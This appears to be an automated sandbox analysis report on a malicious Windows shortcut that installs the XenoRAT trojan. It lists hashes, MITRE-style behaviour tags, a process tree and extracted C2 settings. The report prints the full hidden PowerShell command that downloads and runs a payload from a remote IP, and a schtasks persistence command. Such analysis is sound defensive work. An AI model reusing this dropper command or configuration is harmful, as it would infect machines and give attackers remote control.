Overview

overview

10

Static

static

1

PAGO_Trans...ia.lnk

windows7-x64

10

PAGO_Trans...ia.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-07-2024 11:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PAGO_Transferencia.lnk

  • Size

    2KB

  • MD5

    4db66f511c6604f1be1ae032b84f8358

  • SHA1

    8ab73293cf42ead05326874845622cea78822c8f

  • SHA256

    1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7

  • SHA512

    2cf294db093bbe00ce504d2817dced1d62d7eb8af4a7183836fb4af0288f7e5018cd2226bea522ad5464b911317bd184bb36303e766fa4a59239f87878510c67

Score
10/10
xenoratdiscoveryexecutionrattrojan

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe

Extracted

Family

xenorat

C2

45.66.231.63

Mutex

Holid_rat_nd8859g

Attributes
  • delay

    60400

  • install_path

    appdata

  • port

    1243

  • startup_name

    HDdisplay

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

    trojanratxenorat
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\PAGO_Transferencia.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2116
    • C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1724
      • C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
        "C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4704
        • C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
          C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3904
        • C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
          C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4004
          • C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe
            "C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2784
            • C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe
              C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2928
            • C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe
              C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe
              6⤵
              • Executes dropped EXE
              PID:3272
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 80
                7⤵
                • Program crash
                PID:3044
            • C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe
              C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1104
            • C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe
              C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2252
        • C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
          C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3084
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /Create /TN "HDdisplay" /XML "C:\Users\Admin\AppData\Local\Temp\tmp80E3.tmp" /F
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4336
        • C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
          C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1584
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3272 -ip 3272
    1⤵
      PID:1184

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DisplayResolution.exe.log
      Filesize

      522B

      MD5

      0f39d6b9afc039d81ff31f65cbf76826

      SHA1

      8356d04fe7bba2695d59b6caf5c59f58f3e1a6d8

      SHA256

      ea16b63ffd431ebf658b903710b6b3a9b8a2eb6814eee3a53b707a342780315d

      SHA512

      5bad54adb2e32717ef6275f49e2f101dd7e2011c9be14a32e5c29051e8a3f608cbd0b44ac4855ab21e790cb7a5d84c5f69de087074fd01b35259d34d07f5aaf9

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
      Filesize

      150KB

      MD5

      fcc55ef512ccf37a07ec703b59cc7aad

      SHA1

      9abef70ff67a2a7032ac1da4cd65424e7b2130b7

      SHA256

      38b26e2364bc081a90145838451341f14bda3cbd15bba54bf0114cab5d2f8667

      SHA512

      e26567479340c42126937edba18399af1d070b89c95fb8871dcbf3afb524bc89e289d361f4aa038f655e77b28e095ae3e487d8938248ea3d32677168acd17517

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nx2igiot.ze0.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp80E3.tmp
      Filesize

      1KB

      MD5

      c1fb6c7a2a252aad9a614b2a29769d98

      SHA1

      f6d4f83e1cb6612498178b151edfc155432138c6

      SHA256

      da84b1e8d3d3d979614cb431546c9806ca977b2cf74c5b86e42598408814f292

      SHA512

      3569c7553fda61cf8af6a0e7480e8fc4432ba7c8b6e00fb41e64ea1d73debf2000618ea1bdd193668ddbe43b1d77ae3c934ed80ffca983afc680cd8d595d2529

      Download Submit

    • memory/1724-2-0x00007FF945243000-0x00007FF945245000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1724-9-0x000001DECC0F0000-0x000001DECC112000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1724-13-0x00007FF945240000-0x00007FF945D01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1724-14-0x00007FF945240000-0x00007FF945D01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1724-24-0x00007FF945240000-0x00007FF945D01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3904-27-0x0000000000400000-0x0000000000412000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4704-25-0x0000000000C40000-0x0000000000C6C000-memory.dmp

      Filesize

      176KB

      Download

    • memory/4704-26-0x0000000005670000-0x000000000570C000-memory.dmp

      Filesize

      624KB

      Download